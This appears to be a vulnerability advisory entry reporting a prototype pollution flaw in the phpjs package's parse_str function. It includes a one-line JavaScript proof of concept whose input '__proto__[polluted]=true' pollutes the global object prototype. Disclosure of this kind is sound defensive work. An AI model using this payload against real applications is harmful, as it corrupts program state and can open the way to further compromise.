EPSS
Percentile
79.8%
phpjs is a community built PHP binding in JavaScript. This package is vulnerable to Prototype Pollution via parse_str.
phpjs
Prototype Pollution
parse_str
const phpjs = require('phpjs'); phpjs.parse_str("__proto__[polluted]=true",{}); console.log(polluted);
github.com/kvz/locutus/blob/master/src/php/strings/parse_str.js